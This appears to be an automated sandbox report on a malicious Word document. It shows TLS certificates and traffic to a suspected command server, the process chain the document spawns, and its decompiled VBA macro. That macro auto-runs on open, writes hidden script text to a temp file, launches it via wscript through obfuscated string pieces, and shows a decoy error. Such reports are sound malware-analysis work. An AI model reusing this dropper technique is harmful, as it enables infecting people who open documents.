711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c] |
Nov 9, 2017 14:02:07.483278990 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 | EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | Wed Nov 08 14:01:04 CET 2017 | Thu Nov 08 14:01:04 CET 2018 | [[ Version: V3 Subject: EMAILADDRESS=admin@cracken.ru, CN=cracken.ru, OU=IT, O=Yandex, L=Moscow, ST=Moscow, C=RU Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 148464715531648983675869436801448005946718863850793557755944285026680453005080864507211203883552953769741043350219011504910557537919669791969903003459896832340294027541878102542750730829212775320315093969922839142241184522778636197919003394994226649241173361768835857807624527555332056917985237383197977380209 public exponent: 3 Validity: [From: Wed Nov 08 14:01:04 CET 2017, To: Thu Nov 08 14:01:04 CET 2018] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ acda3d75 8bf3f455]Certificate Extensions: 5[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 8A 3D C0 D2 EA 50 C4 E3 0A 1A C9 E7 A0 F7 0E 99 .=...P..........0010: 44 00 50 00 D.P.]]] Algorithm: [SHA1withRSA] Signature:0000: 4D 84 94 4F 8E 83 0D 0B E4 17 B0 ED 04 4D 21 1E M..O.........M!.0010: F3 C9 56 10 73 3A 6F 57 F7 45 65 6E 4B 9A 69 C0 ..V.s:oW.EenK.i.0020: 0B F9 FC 2B C1 63 BE F8 71 7F 8C 3C BB 90 97 03 ...+.c..q..<....0030: FF E3 95 29 8D DD D1 E8 03 96 04 A9 E0 A2 31 5B ...)..........1[0040: AD 2D 04 E3 D8 52 CA FD 05 5E 96 C5 CC 76 44 76 .-...R...^...vDv0050: 02 0D 9D A1 E2 A3 8E 92 39 6D 3F A0 09 F5 4B 40 ........9m?...K@0060: 9D 61 4E 26 EB 1E AF 14 5C 29 00 0A 64 CA 0C 22 .aN&....\)..d.."0070: 73 E4 14 BB 7C 74 80 4E B4 BC A9 86 32 8E C2 AC s....t.N....2...0080: B5 E3 F1 83 2D C0 B9 89 4F AD E2 80 41 5E 89 8F ....-...O...A^..0090: 84 CA 2B 63 57 F9 44 96 D5 5C 72 96 BD 93 86 33 ..+cW.D..\r....300A0: 94 B5 95 C4 43 D6 FC 75 55 86 6C F9 FE F9 CF FC ....C..uU.l.....00B0: 55 DE B4 72 F7 4C F4 ED 71 6F 85 E1 00 2C 05 FE U..r.L..qo...,..00C0: C2 FC 25 7F 0A 1A E1 A2 3D 4B 7A 62 A2 F6 94 77 ..%.....=Kzb...w00D0: D8 47 F8 41 1B 3C F3 1A DC C8 8A 02 8C 3A 58 82 .G.A.<.......:X.00E0: 48 B5 BF E2 36 7A DD 19 FD F8 72 E8 ED ED A3 F8 H...6z....r.....00F0: E7 01 32 41 1A F7 8E 62 8A 13 D4 FC CD 20 49 B2 ..2A...b..... I.0100: 0E 6F 35 65 4C 8A C1 D7 59 53 0E E2 C8 A0 D5 FF .o5eL...YS......0110: B9 90 D2 2C 93 6F CB BD 64 70 47 B0 B5 59 49 59 ...,.o..dpG..YIY0120: A2 EE 9F 00 E5 CB 8C EB 0A 01 59 12 93 9A 6E A6 ..........Y...n.0130: 4B 09 40 7C 9B 18 3A CD 62 1F 24 D2 E1 A2 71 80 K.@...:.b.$...q.0140: D9 0C A2 1B 8E CF FD 25 FD 82 B7 1E 66 06 68 EF .......%....f.h.0150: 10 40 C3 EC 75 A0 8B E6 CC 49 F5 60 60 C9 36 1D .@..u....I.``.6.0160: B0 7A 46 87 07 04 D7 DE 4C 03 CD 73 54 E5 19 21 .zF.....L..sT..!0170: 4A BE E8 53 69 D5 24 1C 5F 36 2F CD 68 E5 7D E5 J..Si.$._6/.h...0180: 69 0B 16 47 2D DB 76 DA 7E 7C 7E 16 75 C1 9F 69 i..G-.v.....u..i0190: DC 46 5F 6B AA F1 DA 34 CD 4B 70 E3 82 67 BD 7C .F_k...4.Kp..g..01A0: 27 B0 1F 82 96 23 AE 94 24 0F 94 C8 43 4F 29 EE '....#..$...CO).01B0: 7E 9C 7A D2 F6 65 5D 3F 6C 4A 37 70 8B D6 92 64 ..z..e]?lJ7p...d01C0: 14 07 CA 17 52 14 EE 81 79 9D 7B 37 08 52 7F 58 ....R...y..7.R.X01D0: F4 3D F4 00 FD 8A 8E 20 A7 5B CF F2 2B E7 A8 14 .=..... .[..+...01E0: 15 C7 15 67 84 69 FD C2 72 6E 96 D5 1A 82 9C BB ...g.i..rn......01F0: 04 C9 D9 78 85 42 10 13 F0 55 A0 AA 7C 6B 3B 49 ...x.B...U...k;I] |
Nov 9, 2017 14:02:07.483278990 MEZ | 443 | 49170 | 85.93.2.148 | 192.168.1.16 | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US | Tue Mar 17 15:16:38 CET 2015 | Thu Mar 09 15:16:38 CET 2045 | [[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c] |
HTTPS Proxied Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Header / Data | Total Bytes Transfered (KB) |
---|---|---|---|---|---|---|
2017-11-09 13:01:05 UTC | 49163 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:05 UTC | 49163 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:05 UTC | 49163 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:06 UTC | 49164 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:06 UTC | 49164 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:06 UTC | 49164 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:07 UTC | 443 | 49163 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:01:07 UTC | 443 | 49163 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:01:08 UTC | 443 | 49164 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:01:08 UTC | 443 | 49164 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:01:54 UTC | 49168 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:54 UTC | 49168 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:54 UTC | 49168 | 443 | 192.168.1.16 | 85.93.2.148 | 8 | |
2017-11-09 13:01:55 UTC | 443 | 49168 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:01:55 UTC | 443 | 49168 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:01:56 UTC | 49169 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:56 UTC | 49169 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:01:56 UTC | 49169 | 443 | 192.168.1.16 | 85.93.2.148 | 8 | |
2017-11-09 13:01:57 UTC | 443 | 49169 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:02:07 UTC | 49170 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:02:07 UTC | 49170 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:02:07 UTC | 49170 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:02:09 UTC | 443 | 49170 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:02:09 UTC | 443 | 49170 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:02:10 UTC | 49171 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:02:10 UTC | 49171 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:02:10 UTC | 49171 | 443 | 192.168.1.16 | 85.93.2.148 | 0 | |
2017-11-09 13:02:12 UTC | 443 | 49171 | 85.93.2.148 | 192.168.1.16 | 0 | |
2017-11-09 13:02:12 UTC | 443 | 49171 | 85.93.2.148 | 192.168.1.16 | 0 |
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
Behavior |
---|
Click to jump to process
System Behavior |
---|
General |
---|
Start time: | 14:00:53 |
Start date: | 09/11/2017 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x77390000 |
File size: | 1423008 bytes |
MD5 hash: | 5D798FF0BE2A8970D932568068ACFD9D |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:01:02 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x77390000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:01:03 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x75300000 |
File size: | 141824 bytes |
MD5 hash: | 979D74799EA6C8B8167869A68DF5204A |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:01:04 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\schtasks.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x75440000 |
File size: | 179712 bytes |
MD5 hash: | 2003E9B15E1C502B146DAD2E383AC1E3 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:00 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\taskeng.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x772c0000 |
File size: | 192000 bytes |
MD5 hash: | 4F2659160AFCCA990305816946F69407 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:00 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x76f10000 |
File size: | 141824 bytes |
MD5 hash: | 979D74799EA6C8B8167869A68DF5204A |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:03 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x75440000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:03 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x612d0000 |
File size: | 46080 bytes |
MD5 hash: | B9A4DAC2192FD78CDA097BFA79F6E7B2 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:05 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x75440000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:33 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x75440000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:33 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\ARP.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x772c0000 |
File size: | 20992 bytes |
MD5 hash: | ADC7AD3C261D2753CB7A2FE73A66C210 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:35 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x77390000 |
File size: | 302592 bytes |
MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:02:36 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\ARP.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x75440000 |
File size: | 20992 bytes |
MD5 hash: | ADC7AD3C261D2753CB7A2FE73A66C210 |
Programmed in: | C, C++ or other language |
Reputation: | low |
General |
---|
Start time: | 14:03:00 |
Start date: | 09/11/2017 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x75620000 |
File size: | 141824 bytes |
MD5 hash: | 979D74799EA6C8B8167869A68DF5204A |
Programmed in: | C, C++ or other language |
Reputation: | low |
Disassembly |
---|
Code Analysis |
---|
Call Graph |
---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: ThisDocument |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "ThisDocument" |
2 | Attribute VB_Base = "1Normal.ThisDocument" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = True |
7 | Attribute VB_TemplateDerived = True |
8 | Attribute VB_Customizable = True |
9 | Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds as Long) |
Executed Functions |
---|
APIs | Meta Information |
---|---|
CreateObject | CreateObject( |
GetSpecialFolder | |
StrReverse | StrReverse( |
Label1 | |
OpenTextFile | |
Split | |
WriteLine | |
Close | |
Shell | Shell( |
MsgBox |
Strings | Decrypted Strings |
---|---|
"Scripting.FileSystemObject" | |
"|*|" | |
"d.exe /c wsc" | |
"ript.exe //b /e:jsc" | |
"ript " | |
"c" | |
"Decryption failed! Try again" |
Line | Instruction | Meta Information |
---|---|---|
11 | Sub armando() | |
12 | Dim ikgygke | executed |
13 | Dim pbopegh | |
14 | Dim vbspbopegh | |
15 | Dim kuqa | |
16 | Dim knyvlaql | |
17 | Dim agluksad | |
18 | Dim dacxitj | |
19 | Dim ivwubka | |
20 | Set avfasci = CreateObject("Scripting.FileSystemObject") | CreateObject( |
21 | Set icrobbab = avfasci.GetSpecialFolder(2) | GetSpecialFolder |
22 | ikgygke = icrobbab & StrReverse("ini.daphsarc\") | StrReverse( |
23 | vbspbopegh = UserForm1.Label1.Caption | Label1 |
24 | Set ygtekra = avfasci.OpenTextFile(ikgygke, 2, True) | OpenTextFile |
25 | For Each one in Split(vbspbopegh, "|*|") | Split |
26 | ygtekra.WriteLine one | WriteLine |
27 | Next one | Split |
28 | ygtekra.Close | Close |
29 | kuqa = "d.exe /c wsc" | |
30 | knyvlaql = "ript.exe //b /e:jsc" | |
31 | agluksad = "ript " | |
32 | dacxitj = "c" | |
33 | ivwubka = dacxitj & "m" & kuqa & knyvlaql & agluksad & ikgygke | |
34 | Shell ivwubka, False | Shell( |
35 | MsgBox "Decryption failed! Try again" | MsgBox |
36 | End Sub |
APIs | Meta Information |
---|---|
Part of subcall function armando@ThisDocument: CreateObject | |
Part of subcall function armando@ThisDocument: GetSpecialFolder | |
Part of subcall function armando@ThisDocument: StrReverse | |
Part of subcall function armando@ThisDocument: Label1 | |
Part of subcall function armando@ThisDocument: OpenTextFile | |
Part of subcall function armando@ThisDocument: Split | |
Part of subcall function armando@ThisDocument: WriteLine | |
Part of subcall function armando@ThisDocument: Close | |
Part of subcall function armando@ThisDocument: Shell | |
Part of subcall function armando@ThisDocument: MsgBox |
Line | Instruction | Meta Information |
---|---|---|
37 | Sub AutoOpen() | |
38 | armando | executed |
39 | End Sub |
Module: UserForm1 |
---|
Declaration |
---|
Line | Content |
---|---|
1 | Attribute VB_Name = "UserForm1" |
2 | Attribute VB_Base = "0{6B6BF1FB-AD60-430D-9A4A-863E0DAD35DE}{CE2C7631-6144-406D-97FA-AA4F3584AE8A}" |
3 | Attribute VB_GlobalNameSpace = False |
4 | Attribute VB_Creatable = False |
5 | Attribute VB_PredeclaredId = True |
6 | Attribute VB_Exposed = False |
7 | Attribute VB_TemplateDerived = False |
8 | Attribute VB_Customizable = False |